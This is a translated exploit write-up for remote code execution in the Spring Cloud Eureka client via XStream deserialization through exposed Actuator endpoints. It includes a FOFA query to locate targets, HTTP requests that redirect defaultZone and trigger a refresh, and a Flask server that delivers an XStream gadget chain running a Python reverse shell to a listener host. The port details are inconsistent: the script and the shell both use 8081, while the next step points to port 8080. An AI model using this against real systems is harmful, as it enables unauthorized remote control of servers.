I. Root cause
The spring-cloud-starter-netflix-eureka-client component uses XStream to deserialize the registry data it fetches from the Eureka server; under certain conditions this can be abused for RCE.
(XStream is a Java library that serializes objects to XML (or JSON) and deserializes them back into objects.)
II. Exploitation conditions
eureka-client < 1.8.7
The env and refresh endpoints are exposed (the /env and /refresh paths used below are the Spring Boot 1.x Actuator paths; Spring Boot 2.x serves them under /actuator/).
Spring Boot version range unknown (no article covering the affected versions was found).
III. Confirming the vulnerability
With the env endpoint exposed, look through its output for the vulnerable component.
My local environment differs from the one in the reference article, so the reproduction could not be completed there.
IV. Reproduction
FOFA query: app="Eureka-Server"
1. Open the env endpoint and search for "Eureka" to confirm the component is in use.
2. Change the request to a POST that sets defaultZone to a DNSLog domain, to verify the target can reach the outside:
POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://xxx.bjohry.dnslog.cn
3. POST to the refresh endpoint so the client re-reads its configuration (a lookup of the DNSLog domain then shows that the target resolved the new defaultZone):
POST /refresh
Content-Type: application/x-www-form-urlencoded
4. Adjust the Python script: the last port number is the web port the script itself listens on; the port in the middle (inside the reverse-shell command) is the one the listener that receives the shell uses.

#!/usr/bin/env python
# coding: utf-8
# -**- Author: LandGrey -**-
# Serves the XStream gadget-chain XML at every path, so the Eureka client
# receives it whichever registry path it requests under defaultZone.
from flask import Flask, Response

app = Flask(__name__)


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods=['GET', 'POST'])
def catch_all(path):
    # jdk.nashorn.internal.objects.NativeString gadget chain: while XStream
    # rebuilds this object graph the FilterIterator calls ProcessBuilder.start().
    # "****" is the listener host and 8081 in the command is the reverse-shell port.
    xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                      <string>/bin/bash</string>
                      <string>-c</string>
                      <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("****",8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>"""
    return Response(xml, mimetype='application/xml')


if __name__ == "__main__":
    # Web port served to the target; it must differ from the reverse-shell port
    # when the listener runs on the same host as this script.
    app.run(host='0.0.0.0', port=8081)

After starting it, a request to any path returns the XML above, which carries the Python reverse-shell command.
5. Point defaultZone at the script's address through env again, then call refresh:
eureka.client.serviceUrl.defaultZone=http://***:8080/xstream
6. Once the script is running the target keeps calling back: the Eureka client re-fetches the registry from defaultZone at its regular fetch interval, and each fetch deserializes the served XML.
The shell is received and commands execute.
References:
https://www.jianshu.com/p/91a5ca9b7c1c
https://github.com/LandGrey/SpringBootVulExploit
https://www.freebuf.com/column/234719.html
https://blog.csdn.net/blueheart20/article/details/72827666 // fix for installing python3 on a cloud server that has no pip